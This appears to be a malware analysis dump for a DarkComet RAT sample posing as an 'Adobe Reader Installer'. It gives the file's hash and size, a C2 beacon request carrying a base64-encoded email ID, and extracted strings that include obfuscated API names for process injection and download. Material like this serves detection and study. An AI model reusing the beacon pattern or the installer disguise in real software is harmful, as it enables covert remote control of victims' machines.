Dark Comet strings - APT

File: DarkKomet_DC98ABBA995771480AECF4769A88756E.exe_
MD5:  dc98abba995771480aecf4769a88756e
Size: 656896



GET /a.php?id=c2ViYWxpQGxpYmVyby5pdA== HTTP/1.1
Host: [ip.address]



Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
.text
`.rsrc
@.reloc
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
X(,C
x"^i
@h,A
PBr,
2r,YP
?x,-------------------------------------------snip
_2%,
d)@I
D _PM
D%h6
 Uihr!qsnfs`l!b`oonu!cd!sto!ho!ENR!lned/
/udyu
a/srsb
A/sdmnb
*5)+
*-)5
5Y)G
QY)G
UY)G
)Y)G
+/r]
*P*7
Zkdh
mRxrudl/Sdrntsbdr/SdrntsbdSd`eds-!lrbnsmhc-!Wdsrhno<3/1/1/1-!Btmutsd<odtus`m-!QtcmhbJdxUnjdo<c66`4b470825d198"Rxrudl/Sdrntsbdr/StouhldSdrntsbdRdu
Q@EQ@EQ
CRKC
w3/1/41636
"Rushofr
"FTHE
"Cmnc
=Lnetmd?
Uvdsj/emm
Sdrntsbdr
Uvdsj/Qsnqdsuhdr
QSNBDRR^HOGNSL@UHNO
RU@SUTQ^HOGNSL@UHNO
UnjdoQshwhmdfd
rvdf
lrbnsmhc
Rxrudl
Nckdbu
W`mtdUxqd
Rxrudl/Sdrntsbdr
SdrntsbdL`o`fds
sdrntsbdL`o
Rxrudl/Fmnc`mh{`uhno
BtmutsdHogn
sdrntsbdBtmutsd
/buns
fdu^SdrntsbdL`o`fds
fdu^Btmutsd
rdu^Btmutsd
Btmutsd
RidmmDydbtud@
Bsd`udQsnbdrr
FduUisd`eBnoudyu
RduUisd`eBnoudyu
Sd`eQsnbdrrLdlnsx
VshudQsnbdrrLdlnsx
OuTol`qWhdvNgRdbuhno
Whsut`m@mmnbDy
SdrtldUisd`e
LnwdGhmdDy
NqdoUnjdo
FduQshwhmdfdHE
RduQshwhmdfd
RituenvoDy
S`oenl
soeljdx
FduCsnvrdsQ`ui
Cdfho
Ru`suBLE
CSto
I`oemdSto
Rxrudl/Sdgmdbuhno
@rrdlcmx
StoBMS
Qdsr
Ru`suQdsr
QsnbdrrI`oemd
Uisd`eI`oemd
QsnbdrrHe
Uisd`eHe
Rh{d
Sdrdswde0
Edrjunq
Uhumd
Lhrb
Sdrdswde3
RueHoqtu
RueNtuqtu
RueDssns
Bntou
MTHE
Gm`fr
RUDQRH[D
BNQXMDOFUI
LM^CHUR
LM^L@RJ
STO^CHUR
STO^L@RJ
l^Edb@ss`x
l^Edb3u`cmd
BnqxLdlnsx
Edbnlqsdrr
w`mtd
Q`sdou
Nqds`uhnoUxqd
GhmdMnb`uhno
Q`s`ldudsr
Ru`suEhsdbunsx
RinvUxqd
`qqmhb`uhnoO`ld
bnll`oeMhod
qsnbdrr@uushctudr
uisd`e@uushctudr
hoidshuI`oemdr
bsd`uhnoGm`fr
dowhsnoldou
btssdouEhsdbunsx
ru`sutqHogn
qsnbdrrHognsl`uhno
uisd`e
bnoudyu
qsnbdrr
c`rd@eesdrr
ctggds
ctggdsRh{d
cxudrSd`e
cxudrVshuudo
i`oemd
`eesdrr
mdofui
uxqd
qsnudbu
ghmdO`ld
odvO`ld
gm`fr
`bbdrr
unjdo
l`bihod
o`ld
mthe
sdmd`rd
odvRu`ud
{dsn0
{dsn3
{dsn2
ldrr`fd
uhldntu
gnsbd
sdcnnu
sd`rno
ihed
`sfr
nobd
q`ui
e`u`
Choe
Hokdbu
bnlq`u`cmd
bnlq`uhcmd
rv`f
mnb`uhno
bnlqsdrrde
bnlqsdrrdeCtggds
edbnlqsdrrdeCtggds
bnlqsdrrdeRh{d
bnlqsdrrdeQnrhuhno
edbnlqsdrrdeQnrhuhno
l`yEdbnlqsdrrdeRh{d
@rrdlcmxUhumd@uushctud
@rrdlcmxEdrbshquhno@uushctud
@rrdlcmxBnoghfts`uhno@uushctud
@rrdlcmxBnlq`ox@uushctud
@rrdlcmxQsnetbu@uushctud
@rrdlcmxBnqxshfiu@uushctud
@rrdlcmxUs`edl`sj@uushctud
@rrdlcmxBtmutsd@uushctud
Rxrudl/Stouhld/HoudsnqRdswhbdr
BnlWhrhcmd@uushctud
Fthe@uushctud
@rrdlcmxWdsrhno@uushctud
@rrdlcmxGhmdWdsrhno@uushctud
Rxrudl/Rdbtshux/Qdslhrrhnor
RdbtshuxQdslhrrhno@uushctud
Rdbtshux@buhno
Rxrudl/Eh`fonruhbr
Edctff`cmd@uushctud
EdctffhofLnedr
Rxrudl/Stouhld/BnlqhmdsRdswhbdr
Bnlqhm`uhnoSdm`y`uhnor@uushctud
StouhldBnlq`uhchmhux@uushctud
Uvdsj
Rxrudl/BnedEnl/Bnlqhmds
Fdods`udeBned@uushctud
EdctffdsOnoTrdsBned@uushctud
BnlqhmdsFdods`ude@uushctud
SdgdsdobdDpt`mr
Uxqd
StouhldUxqdI`oemd
FduUxqdGsnlI`oemd
fdu^@rrdlcmx
Rxrudl/BnlqnodouLnedm
DehunsCsnvr`cmd@uushctud
DehunsCsnvr`cmdRu`ud
EmmHlqnsu@uushctud
Ridmm23
jdsodm23/emm
ouemm/emm
`ew`qh23/emm
NqdoQsnbdrrUnjdo
MnnjtqQshwhmdfdW`mtd
@ektruUnjdoQshwhmdfdr
Hohuh`udRxrudlRituenvoDy
Rushof
Dlqux
UnBi`s@ss`x
Odyu
Bi`s
Bnob`u
Lhbsnrngu/Vho23
Sdfhrusx
SdfhrusxJdx
Bm`rrdrSnnu
NqdoRtcJdx
BtssdouTrds
FduW`mtd
UnRushof
UnMnvds
Sdqm`bd
DoerVhui
M`ruHoedyNg
Rtcrushof
Bmnrd
Rxrudl/Vhoenvr/Gnslr
@qqmhb`uhno
fdu^Dydbtu`cmdQ`ui
Rxrudl/HN
GhmdHogn
Q`ui
FduUdlqQ`ui
GhmdRxrudlHogn
fdu^O`ld
Ghmd
Dyhrur
Qsnbdrr
QsnbdrrRu`suHogn
QsnbdrrVhoenvRuxmd
rdu^VhoenvRuxmd
Dowhsnoldou
fdu^RxrudlEhsdbunsx
rdu^GhmdO`ld
rdu^@sftldour
rdu^Ru`suHogn
Ru`su
Rxrudl/Odu
VdcBmhdou
HVdcQsnyx
rdu^Qsnyx
Envomn`eE`u`
Vshud@mmCxudr
HouQus
[dsn
Mn`e
Bnlchod
Gnsl`u
L`sri`m
Rh{dNg
Bnowdsu
UnTHou23
HrOtmmNsDlqux
Dybdquhno
ChuBnowdsuds
UnHou23
Hou23
UnHou07
Cxud
Ctggds
@ss`x
CmnbjBnqx
FduCxudr
FduQsnbdrrCxHe
Jhmm
Rxrudl/Uisd`ehof
Q`s`ldudsh{deUisd`eRu`su
Uisd`e
@q`suldouRu`ud
Rdu@q`suldouRu`ud
LduineHogn
fdu^DousxQnhou
LduineC`rd
Q`s`ldudsHogn
FduQ`s`ldudsr
Hownjd
FduGhmdO`ld
V`huGnsDyhu
FduBtssdouQsnbdrr
fdu^I`oemd
/bbuns
RustbuM`xntu@uushctud
M`xntuJhoe
L`sri`m@r@uushctud
Tol`o`fdeUxqd
RCxud
=Qshw`udHlqmdldou`uhnoEdu`hmr?z2EG@GG58,GB4B,5538,8142,97BE60GEGB41|
%%lduine1y7111139,0
StouhldIdmqdsr
StouhldGhdmeI`oemd
Hohuh`mh{d@ss`x
%%lduine1y7111139,3
Rxrudl/Rdbtshux
Towdshgh`cmdBned@uushctud
Uvdsj/Qsnqdsuhdr/Sdrntsbdr/sdrntsbdr
2Rxrudl/Sdrntsbdr/Unnmr/RusnofmxUxqdeSdrntsbdCthmeds
5/1/1/1
Uvdsj
Bnqxshfiu!
!!3102
%75e522e5,0c16,5205,c424,1`9gd`e`104`
0/1/1/1
Vs`qOnoDybdquhnoUisnvr
Rxrudl/Rdbtshux/Qdslhrrhnor/RdbtshuxQdslhrrhno@uushctud-!lrbnsmhc-!Wdsrhno<3/1/1/1-!Btmutsd<odtus`m-!QtcmhbJdxUnjdo<c66`4b470825d198
RjhqWdshghb`uhno
SRER
b;]Trdsr]@elho]Edrjunq]Edctf!Bsxquds]Uvdsj]nck]Edctf]Uvdsj/qec
^BnsEmmL`ho
lrbnsdd/emm
BSJB
v2.0.50727
#Strings
#GUID
#Blob
<Module>
755978578VMServer.exe
Program
frmMain
mscorlib
System
Object
System.Windows.Forms
Form
Main
System.Reflection
Assembly
assembly
Persistance
System.ComponentModel
ComponentResourceManager
manager
.ctor
EventArgs
tick_Tick
GetResource
SetVisibleCore
InitializeComponent
System.Collections.Generic
List`1
AquireData
Decrypt
sender
ResName
value
swag
data
AssemblyTitleAttribute
AssemblyDescriptionAttribute
AssemblyProductAttribute
AssemblyCompanyAttribute
AssemblyCopyrightAttribute
AssemblyVersionAttribute
AssemblyFileVersionAttribute
System.Security.Permissions
SecurityPermissionAttribute
SecurityAction
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
755978578VMServer
STAThreadAttribute
Application
EnableVisualStyles
SetCompatibleTextRenderingDefault
System.Resources
ResourceManager
GetObject
Load
Int32
Boolean
Type
GetTypes
MethodInfo
GetMethods
ToArray
MethodBase
Invoke
Byte
.cctor
RuntimeTypeHandle
GetTypeFromHandle
System.Security
UnverifiableCodeAttribute
frmMain.resources
host
Adobe Reader Installer
Solid State Networks
(Copyright (C) Adobe Systems Incorporated
3.3.7.0
WrapNonExceptionThrows
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
SkipVerification
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
    <security>
      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
        <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>

Unicode Strings:
---------------------------------------------------------------------------
 [O'
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
Adobe Reader Installer
CompanyName
Solid State Networks
FileDescription
host
FileVersion
3.3.7.0
InternalName
755978578VMServer.exe
LegalCopyright
Copyright (C) Adobe Systems Incorporated
OriginalFilename
755978578VMServer.exe
ProductName
Adobe Reader Installer
ProductVersion
3.3.7.0
Assembly Version
3.3.7.0